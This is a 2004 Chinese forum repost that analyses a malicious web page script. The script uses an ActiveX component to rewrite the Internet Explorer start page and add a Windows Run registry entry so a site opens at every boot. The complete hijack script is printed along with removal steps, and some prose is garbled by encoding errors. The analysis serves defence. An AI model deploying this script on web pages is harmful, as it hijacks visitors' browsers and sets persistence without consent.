通行证注册
登录
河源学生网
搜索
插件
帮助
导航
动漫轻小说
默认风格
greyish-green
green
gray
brown
blue
orange
pink
purple
red
violet
招财新年
fervor
招财新年_0JUr
私人消息 (0)
公共消息 (0)
论坛任务 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
河源学生社区
»
电脑数码
» [转帖]解剖恶意网站代码:弹出IE页面
返回列表
发帖
Anasn
发短消息
加为好友
Anasn
当前离线
UID
2579
帖子
25
精华
0
积分
126
经验
113 点
威望
0 点
金钱
389 ¥
魅力
88 点
臭蛋
0 个
宝石
0 粒
学校
年级
阅读权限
10
性别
男
在线时间
0 小时
注册时间
2004-5-20
最后登录
2004-9-6
小天使
帖子
25
积分
126
威望
0 点
魅力
88 点
宝石
0 粒
阅读权限
10
最后登录
2004-9-6
楼主
跳转到
»
倒序看帖
打印
字体大小:
t
T
发表于 2004-5-20 22:21
|
只看该作者
[转帖]解剖恶意网站代码:弹出IE页面
来源:
http://gebitu.vicp.net/bbs/topic.asp?l_id=35&t_id=540
许多网友纷纷指出有的网站不择手段,当用户访问过它们的网页后,不仅IE默认首页被篡改了,而且每次开机后IE都会自动弹出访问该网站。
?牐犖仪通过对下面这段JavaScript程序的解剖,希望读者能明白其究竟,并掌握修复的方法。网站应该用丰富精彩的栏目来吸引访问者,希望通过对用户注册表的恶意篡改来达到提高访问量的目的不仅会事得其反,更是一种不道德的行为。
?牐牨敬?码由子昂轩编辑制作,仅供学习研究之用。
?牐?
<!--
Begin
set
start
page
brought
to
u
by
JavaHouse.126.com--> <SCRIPT
language=javascript> document.write("<APPLET
HEIGHT=0
WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>"); function
f(){ try { //ActiveX初始化过程(为达到修改用户注册表所必须的准备程序) a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl
=
a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO
=
a1.GetObject(); a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Net
=
a1.GetObject(); try { if
(documents.cookie.indexOf("Chg")
==
-1) //以下是检测用户注册表并修改相应的键值 { Shl.RegWrite
("HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page",
"
http://JavaHouse.126.com/"
;);//修改用户InternetExplorer浏览器的默认主页 Shl.RegWrite
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
"
http://JavaHouse.126.com/"
;);//建立默认启动页面程序,保证用户每次启动计算机首先打开该页面 var
expdate
=
new
Date((new
Date()).getTime()
+
(1)); documents.cookie="Chg=general;
expires="
+
expdate.toGMTString()
+
";
path=/;" } } catch(e) {} } catch(e) {} } function
init() { setTimeout("f()",
1000);//实现打开页面后1秒钟内执行测试修改注册表的工作 } init();</SCRIPT> <!--End
set
start
page
-->
首先,我们来分析一下这句代码,程序中使用:
?牐?
Shl.RegWrite
("HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page",
"
http://JavaHouse.126.com/"
;);//修改用户InternetExplorer浏览器的默认主页
?牐犉涫稻褪切薷挠没ё⒉岜碇?
?牐?
HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\main\文件夹下Start
Page的键值,
?牐犝饫锩娴闹稻褪谴娣诺腎E浏览器的默认主页,如果你想改回来,把上面的相应代码改为:
?牐?
Shl.RegWrite
("HKCU\\Software\\Microsoft\\Internet
Explorer\\Main\\Start
Page",
"about:blank");
?牐牼涂梢允迪执蚩狪E是空白页了;当然你也不用动注册表,直接打开IE修改Internet选项中的主页更方便些。
?牐犜倮纯纯瓷鲜龀绦蜃畋氨傻囊痪浯?码:
?牐?
Shl.RegWrite
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
"
http://JavaHouse.126.com/"
;);//建立默认启动页面程序,保证用户每次启动计算机首先打开该页面
?牐犕ü?在注册表中
?牐?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
?牐犖募?夹下建立Windows默认启动程序,当Windows启动后,我们会发现这个网页会自动打开,但是在“开始”-“程序”-“启动”中却找不到,这是为什么呢?哦,原来都放到Run这个文件夹下面了。怎么来修改呢?两种方法,一是查找源头,进入注册表,删除Run下面的相应项就可以了;二是在“开始”-“运行”处输入"msconfig",把启动下面相应的那个网站前面的"√"去掉,重新启动计算机就可以了。
?牐牨苊獯死喽褚庑薷淖⒉岜淼脑俅畏⑸?,你可以在IE的安全属性设置中禁掉ActiveX,当然在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览。还有一种办法就是对于Windows98打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把ActiveXComponent.class删掉;对于WindowsMe打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把ActiveXComponent.class删掉。放心,删除这个组件不会影响你正常浏览网页的。
?牐犠詈笏邓翟谑滓呈褂谜饫啻?码的网站的目的,像在启动计算机直接打开网页的做法我认为主要是针对宽带和专线上网的用户,这样只要你不修改注册表禁掉它,你的IE主页每次进入系统都会自动被修改成那个网站;对于拨号上网的用户每次进入系统都开一个找不到的主页,也无所谓,至少你不改注册表,直接修改IE主页属性后可以避免被那种网站再次修改(前提是不再进那个网站),可是每次开机后都弹出个网页也真是让人讨厌。
?牐犚陨洗?码适用于Windows9x/Me,InternetExplorer5.X浏览器,据说对IE6.0无效(因为它里面没有ActiveXComponent.class这个组件),但作者没有测试过。
收藏
分享
返回列表
休闲交流
Ready?Go!
七嘴八舌
大学生活
心情日记
坦言心扉
热点聚焦
经典图区
靓照show
图像处理
青涩苹果
活动聚会
互助中心
专题合作
兴趣爱好
学习交流
斟文酌学
健康生活
影视音乐
潮流时尚
街头文化
星座情缘
凶灵在线
ACG御宅
体育世界
电脑数码
信息发布
跳蚤市场
兼职招聘
培训&家教
校园&地区
市一中学
河源中学
啸仙中学
光明学校
东源地区
其他分区
娴兰中学
市田家炳
东埔中学
河 职 院
河源中英文学校
紫金地区
和平地区
连平地区
龙川地区
站务版块
网站公告
社区事务
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
勋章中心
IE8加速器
社区大冒险
领取红包
社区银行
道具中心